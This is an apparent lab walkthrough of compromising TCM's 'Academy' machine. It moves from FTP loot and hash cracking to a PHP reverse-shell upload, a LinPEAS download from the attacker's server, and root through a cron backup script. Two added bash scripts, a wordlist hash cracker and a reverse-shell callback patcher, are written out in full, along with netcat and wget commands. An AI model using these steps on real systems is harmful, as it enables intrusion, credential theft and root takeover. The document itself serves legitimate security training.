
ACADEMY WALKTHROUGH

  • Writer: Strider Gearhead
  • Feb 17, 2023
  • 3 min read

Updated: Feb 20, 2023

This machine is named ACADEMY and is owned by TCM. Here is the link: https://drive.google.com/file/d/1u4628J7AwEzFCS3gWZbJgv-lhGzwmrvf/view?usp=share_link

First, we boot the machine named Academy and find its IP address. Then we run an nmap scan to learn which ports are open and which services (and versions) are listening on them; nmap only reports the services, so whether one is actually vulnerable is something we still have to check ourselves. The command for the nmap scan is:

nmap -T4 -p- -A <Target IP>

[screenshot: nmap scan results]

In the scan we can see that port 21 (FTP) is open and that anonymous login is allowed. We log in over FTP as the anonymous user and download note.txt.

The note.txt file contains some information:

[screenshot: contents of note.txt]

The note gives a registration number and a password, and the password looks like a hash. So first we identify the hash type, then we crack it to recover the plaintext. hash-identifier will tell us the likely algorithm, and crackstation.net can identify and crack the hash in one step, as shown in the image below.

[screenshot: crackstation.net result]
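Online services are convenient, but submitting a hash from an engagement to a third-party site is not always acceptable, and a short hash cracker is easy to do offline. The following is an added example (not from the original walkthrough) that guesses the algorithm from the digest length and tries every word of a wordlist against it with the coreutils md5sum/sha1sum/sha256sum tools. The wordlist and the target digest below are constructed for the demo; the hash from note.txt is not reproduced here.

```bash
#!/usr/bin/env bash
# Added example: offline hash identification and wordlist cracking.
# Assumes GNU/BSD coreutils (md5sum, sha1sum, sha256sum, cut, tr).

# Guess the algorithm from the digest length (32/40/64 hex characters).
identify_hash() {
    local h="$1"
    case "${#h}" in
        32) echo "md5" ;;
        40) echo "sha1" ;;
        64) echo "sha256" ;;
        *)  echo "unknown"; return 1 ;;
    esac
}

# Hash one candidate. No trailing newline: web apps usually hash the raw
# password string, and "printf '%s'" avoids the newline that echo adds.
hash_word() {
    local algo="$1" word="$2"
    printf '%s' "$word" | "${algo}sum" | cut -d' ' -f1
}

# crack_hash <hex digest> <wordlist>: prints the matching word and returns 0,
# or returns 1 when nothing in the list matches or the digest is unknown.
crack_hash() {
    local target wordlist algo word
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')   # normalise case
    wordlist="$2"
    algo=$(identify_hash "$target") || return 1
    while IFS= read -r word || [ -n "$word" ]; do
        [ -z "$word" ] && continue
        if [ "$(hash_word "$algo" "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Demo with a constructed wordlist and a constructed MD5 target.
demo_wordlist=$(mktemp)
printf '%s\n' 123456 password letmein qwerty > "$demo_wordlist"
demo_target=$(hash_word md5 letmein)
printf 'algorithm: %s\n' "$(identify_hash "$demo_target")"
printf 'cracked:   %s\n' "$(crack_hash "$demo_target" "$demo_wordlist")"
rm -f "$demo_wordlist"
```

Point the wordlist argument at /usr/share/wordlists/rockyou.txt for a real attempt; for a 32-character hex digest the length check only says "probably MD5", so if rockyou gives nothing, try the other 128-bit candidates (e.g. NTLM) with a dedicated cracker such as hashcat or john.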

Now we have the password, so we hold a registration number (the username) and a password. Next we need to find where these credentials can be used, so we do directory busting with ffuf.

Command: ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://<Target IP>/FUZZ

Three directories are found; they are shown in the image below.

[screenshot: ffuf results]

Now we check the academy directory. It serves a login page:

[screenshot: academy login page]

We can log in to this page with the credentials from note.txt. Let's log in.

[screenshot: student portal after login]

The portal has an upload option, and that is the vulnerability: it lets us upload a PHP reverse shell and get a shell from the target back on our machine. The script is available at https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

We change the default IP address in the script to our own, save the file with a .php extension and upload it through the student portal to get the reverse shell.

[screenshot: php-reverse-shell.php with the IP address changed]

Before uploading the PHP file we start a listener to catch the reverse shell (the script's default port is 1234, which matches the listener below), then upload the file to the vulnerable portal.

Command: nc -nlvp 1234
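Editing the two "CHANGE THIS" lines by hand works, but it is easy to leave one of them at the default and then wait on a listener that never connects. The following is an added example (not the author's or pentestmonkey's code) that patches the $ip and $port assignments of php-reverse-shell.php with sed, validates the values first so nothing else in the script is touched, and verifies that the patched copy really carries the new target. The stub it runs on is constructed here and only reproduces the two lines that matter; the 10.10.14.5:4444 callback is an assumption for the demo.

```bash
#!/usr/bin/env bash
# Added example: set the callback target in pentestmonkey's php-reverse-shell.
# The script carries two assignments of the form
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# patch_revshell rewrites only those two lines.

# patch_revshell <src.php> <dst.php> <LHOST> <LPORT>
patch_revshell() {
    local src="$1" dst="$2" lhost="$3" lport="$4"
    # Only dotted-quad addresses and numeric ports are accepted, so a stray
    # quote or space cannot break the sed expression or the resulting PHP.
    case "$lhost" in
        *[!0-9.]*|'') echo "bad LHOST: $lhost" >&2; return 1 ;;
    esac
    case "$lport" in
        *[!0-9]*|'') echo "bad LPORT: $lport" >&2; return 1 ;;
    esac
    # [$] is a literal dollar sign in the regex; \1 keeps the "$ip = " prefix.
    sed -e "s/^\([$]ip = \)'[^']*';/\1'${lhost}';/" \
        -e "s/^\([$]port = \)[0-9]*;/\1${lport};/" "$src" > "$dst" || return 1
    # Refuse a silently unpatched copy: both lines must now carry our values.
    grep -q "^[$]ip = '${lhost}';" "$dst" && grep -q "^[$]port = ${lport};" "$dst"
}

# revshell_target <file.php>: print "ip port" as currently set in the script,
# useful as a last check before uploading.
revshell_target() {
    local ip port
    ip=$(sed -n "s/^[$]ip = '\([^']*\)';.*/\1/p" "$1")
    port=$(sed -n "s/^[$]port = \([0-9]*\);.*/\1/p" "$1")
    printf '%s %s\n' "$ip" "$port"
}

# Demo on a constructed stub (the real script is far longer; only these two
# lines differ after patching).
stub=$(mktemp)
cat > "$stub" <<'EOF'
<?php
set_time_limit (0);
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
patch_revshell "$stub" "$stub.patched" 10.10.14.5 4444
revshell_target "$stub.patched"
# Next: start "nc -nlvp 4444" on the attacker box, then upload the patched
# file through the portal and browse to it.
rm -f "$stub" "$stub.patched"
```

The port you pass must be the one the nc listener is bound to; if the portal renames uploads, browse to the stored filename rather than the one you uploaded, because the shell only connects back when the PHP is actually executed.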

[screenshot: netcat listener]

After setting up the listener and uploading the PHP shell, we get a shell as www-data.

[screenshot: reverse shell as www-data]

We have no privileges at the moment, so we move on to privilege escalation with LinPEAS. First we download linpeas.sh to the attacker machine and start an HTTP server there so the target can fetch it.

Command to start the HTTP server: python3 -m http.server 80

Now we download linpeas.sh onto the target and run it.

Command to download from our server: wget http://<attacker IP>/linpeas.sh

After downloading it we make it executable and run linpeas.sh on the target.

In the image below we can see that there is a backup script at /home/grimmie/backup.sh.

[screenshot: LinPEAS output showing /home/grimmie/backup.sh]

Scrolling through the LinPEAS output, we also find a config.php file containing a username and password. The path is /var/www/html/academy/includes/config.php. The credentials are shown in the image below.

[screenshot: credentials in config.php]

The nmap scan also showed that SSH (port 22) is open, so we try these credentials over SSH; the database password from config.php turns out to be reused for the grimmie account.

Command: ssh grimmie@<target IP>

After logging in over SSH we find the backup.sh file in grimmie's home directory.

[screenshot: backup.sh in grimmie's home directory]

Now we use a tool called pspy to watch running processes without needing root privileges. We download pspy64 onto the target from our HTTP server, as before, make it executable (chmod +x pspy64) and run it.

In the image below we can see that backup.sh is executed periodically, and that it runs as root.

[screenshot: pspy output showing backup.sh being executed]

So we edit backup.sh and put a bash reverse shell one-liner in it. Because the cron job runs the script as root, the next run executes our line automatically and hands us a root reverse shell.

As in the previous step, we set up a listener first so the shell has something to connect back to.

The one-liner comes from the pentestmonkey.com reverse shell cheat sheet; we replace the default IP address with our own and make sure the port matches our listener.

[screenshot: backup.sh with the reverse shell one-liner added]

After saving the file, the next cron run executes it as root and our listener catches the reverse shell.

Now we are root on this machine, and there is a flag.txt:

[screenshot: root shell]

Here is the flag:

[screenshot: flag.txt]
